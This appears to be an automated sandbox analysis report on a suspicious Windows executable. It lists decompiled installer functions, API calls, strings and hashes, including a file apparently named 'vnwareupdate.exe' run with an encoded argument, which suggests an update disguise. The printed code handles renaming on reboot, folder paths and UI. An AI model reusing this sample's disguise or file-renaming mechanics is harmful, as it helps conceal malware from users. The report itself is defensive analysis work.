Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405C0F, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C0F(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c600 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca00, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c200, "%s=%s\r\n", 0x42c600, 0x42ca00);
						_t53 = _t52 + 0x10;
						E00405FC2(_t37, 0x400, 0x42ca00, 0x42ca00,  *((intOrPtr*)( *0x42f414 + 0x128)));
						_t12 = E00405B39(0x42ca00, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405BB1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405A9E(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405A9E(_t38, _t21 + 0xa, 0x40a3b8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405AF4(_t24 + _t46, 0x42c200, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405BE0(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405B39(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c600, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405c0f
0x00405c18
0x00405c1f
0x00405c33
0x00405c5b
0x00405c66
0x00405c6a
0x00405c8a
0x00405c91
0x00405c9b
0x00405ca8
0x00405cad
0x00405cb2
0x00405cb6
0x00405cc5
0x00405cc7
0x00405cd4
0x00405cd8
0x00405d73
0x00000000
0x00405cee
0x00405cfb
0x00405d1f
0x00405d23
0x00405d42
0x00405d46
0x00405d46
0x00405d48
0x00405d51
0x00405d5c
0x00405d67
0x00405d6d
0x00000000
0x00405d6d
0x00405d25
0x00405d28
0x00405d33
0x00405d2f
0x00405d31
0x00405d32
0x00405d32
0x00405d3a
0x00405d3c
0x00000000
0x00405d3c
0x00405d06
0x00405d0c
0x00000000
0x00405d0c
0x00405cd8
0x00405cb6
0x00405c35
0x00405c40
0x00405c49
0x00405c4d
0x00000000
0x00000000
0x00405c4d
0x00405d7e

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
GetShortPathNameA.KERNEL32 ref: 00405C49

Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

GetShortPathNameA.KERNEL32 ref: 00405C66
wsprintfA.USER32 ref: 00405C84
GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
GlobalFree.KERNEL32 ref: 00405D6D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74

Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\GZe6EcSTpO.exe,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

Strings

%s=%s, xrefs: 00405C7A
[Rename], xrefs: 00405CEE, 00405D00

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
Opcode Fuzzy Hash: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405FC2, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00405FC2(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebdc; // 0x546847
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f458;
				_t39 = 0x42e3a0;
				_t90 = 0x42e3a0;
				if(_a4 >= 0x42e3a0 && _a4 - 0x42e3a0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00405FC2(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3a0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E00405FA0(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00405EFE(_t90,  *0x42f408);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E0040620A(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f40c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4a4;
						if( *0x42f4a4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f404;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f408,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f408,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405E87((_t80 & 0x0000003f) +  *0x42f458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f458, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405FC2(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00405FA0(_a4, _t39);
			}

0x00405fc2
0x00405fc2
0x00405fc2
0x00405fc8
0x00405fcd
0x00405fcf
0x00405fde
0x00405fde
0x00405fe6
0x00405fe7
0x00405fe8
0x00405fe9
0x00405fec
0x00405ff4
0x00405ff6
0x0040600d
0x00406010
0x00406010
0x004061e7
0x004061e7
0x004061eb
0x00000000
0x00000000
0x0040601d
0x00406023
0x00000000
0x00000000
0x00406029
0x0040602a
0x0040602d
0x00406030
0x004061da
0x004061e4
0x004061e6
0x004061e6
0x004061dc
0x004061de
0x004061e0
0x004061e1
0x004061e1
0x00000000
0x004061da
0x00406036
0x0040603a
0x0040604a
0x00406051
0x00406054
0x0040605c
0x0040605f
0x00406066
0x00406067
0x0040606a
0x00406187
0x0040618a
0x004061ba
0x004061bd
0x004061c2
0x004061c6
0x004061c6
0x004061cb
0x004061d1
0x004061d3
0x00000000
0x004061d3
0x0040618c
0x0040618f
0x004061a4
0x004061ab
0x00406191
0x00406198
0x00406198
0x004061b3
0x004061b6
0x0040617f
0x00406180
0x00406180
0x00000000
0x004061b6
0x00406070
0x00406077
0x00406079
0x0040607a
0x00406094
0x00406094
0x0040609b
0x0040609b
0x004060a2
0x004060a6
0x004060a6
0x004060a7
0x004060a9
0x004060e2
0x004060e5
0x004060f5
0x004060f8
0x00406100
0x00406106
0x00406106
0x00406165
0x00406165
0x00406167
0x00000000
0x00000000
0x0040610a
0x00406111
0x00406112
0x00406114
0x0040612e
0x0040613c
0x00406142
0x00406144
0x00406162
0x00406162
0x00406162
0x00000000
0x00406162
0x0040614a
0x00406153
0x00406156
0x0040615c
0x00406160
0x00000000
0x00000000
0x00000000
0x00406160
0x00406116
0x00406119
0x00000000
0x00000000
0x00406128
0x0040612a
0x0040612c
0x00000000
0x00000000
0x00000000
0x0040612c
0x00000000
0x00406165
0x004060ed
0x00000000
0x004060ab
0x004060c6
0x004060cb
0x004060ce
0x0040616e
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x00000000
0x00406172
0x004060d8
0x00406169
0x00406169
0x0040616c
0x00000000
0x00000000
0x00000000
0x0040616c
0x004060a9
0x0040607c
0x00406080
0x00000000
0x00000000
0x00406082
0x00406086
0x00000000
0x00000000
0x00406088
0x0040608c
0x00000000
0x0040608e
0x0040608e
0x00000000
0x0040608e
0x0040608c
0x004061f1
0x004061fb
0x00406207
0x00406207
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 004060ED
GetWindowsDirectoryA.KERNEL32("C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,00000400,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 00406100
SHGetSpecialFolderLocation.SHELL32(004050FF,74B5EA30,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 0040613C
SHGetPathFromIDListA.SHELL32(74B5EA30,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD), ref: 0040614A
CoTaskMemFree.OLE32(74B5EA30), ref: 00406156
lstrcatA.KERNEL32("C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
lstrlenA.KERNEL32("C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,?,0042A050,00000000,004050FF,0042A050,00000000,00000000,00555CB4,74B5EA30), ref: 004061CC

Strings

GhT, xrefs: 00405FCF
Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BC
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406174
"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD, xrefs: 00405FEC, 004060B9, 004060BA, 004060BB, 004060D7, 004060EC, 004060FF, 0040611B, 00406146, 00406179, 0040617F, 00406197, 004061AA, 004061C5, 004061CB, 004061D3, 004061FD

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: "C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD$GhT$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-2091341171
Opcode ID: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
Opcode Fuzzy Hash: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040620A, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620A(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004059A5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405963("*?|<>/\":", _t5))) == 0) {
							E00405AF4(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x0040620c
0x00406214
0x00406228
0x00406228
0x0040622e
0x0040623b
0x0040623b
0x0040623c
0x0040623e
0x00406242
0x00406244
0x0040624d
0x0040624f
0x00406269
0x00406271
0x00406271
0x00406276
0x00406278
0x0040627a
0x0040627e
0x0040627f
0x00406282
0x0040628a
0x0040628c
0x00406290
0x00000000
0x00000000
0x00406296
0x0040629b
0x00000000
0x00000000
0x00000000
0x0040629b
0x004062a0

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
CharNextA.USER32(?,"C:\Users\user\Desktop\GZe6EcSTpO.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284

Strings

*?|<>/":, xrefs: 00406252
C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B
"C:\Users\user\Desktop\GZe6EcSTpO.exe" , xrefs: 00406246

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\GZe6EcSTpO.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1607522425
Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE

Uniqueness

Uniqueness Score: -1.00%

Function 004040A6, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004040A6(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004040b8
0x0040416e
0x00000000
0x0040416e
0x004040c9
0x004040cd
0x00000000
0x004040e7
0x004040e7
0x004040f0
0x00000000
0x00000000
0x004040f2
0x004040fe
0x00404101
0x00404101
0x00404107
0x0040410d
0x0040410d
0x00404119
0x0040411f
0x00404126
0x00404129
0x0040412c
0x0040412e
0x0040412e
0x00404136
0x0040413c
0x0040413c
0x00404146
0x0040414b
0x0040414e
0x00404153
0x00404156
0x00404156
0x00404166
0x00404166
0x00000000
0x00404169

APIs

GetWindowLongA.USER32 ref: 004040C3
GetSysColor.USER32(00000000), ref: 00404101
SetTextColor.GDI32(?,00000000), ref: 0040410D
SetBkMode.GDI32(?,?), ref: 00404119
GetSysColor.USER32(?), ref: 0040412C
SetBkColor.GDI32(?,?), ref: 0040413C
DeleteObject.GDI32(?), ref: 00404156
CreateBrushIndirect.GDI32(?), ref: 00404160

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004050C7, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050C7(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ebe4; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4d4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405FC2(0, _t39, 0x42a050, 0x42a050, _a4);
					}
					_t26 = lstrlenA(0x42a050);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebc8, 0x42a050);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a050;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a050)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a050, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x004050cd
0x004050d9
0x004050dc
0x004050e2
0x004050ee
0x004050f1
0x004050f4
0x004050fa
0x004050fa
0x00405100
0x00405108
0x0040510b
0x00405128
0x0040512c
0x00405135
0x00405135
0x0040513f
0x00405148
0x00405154
0x0040515b
0x0040515f
0x00405162
0x00405175
0x00405183
0x00405183
0x00405187
0x00405189
0x0040518c
0x00000000
0x0040518c
0x0040510d
0x00405115
0x0040511d
0x00405123
0x00000000
0x00405123
0x0040511d
0x0040510b
0x00405196

APIs

lstrlenA.KERNEL32(0042A050,00000000,00555CB4,74B5EA30,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
lstrlenA.KERNEL32(004030F7,0042A050,00000000,00555CB4,74B5EA30,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,00555CB4,74B5EA30), ref: 00405123
SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Memory Dump Source

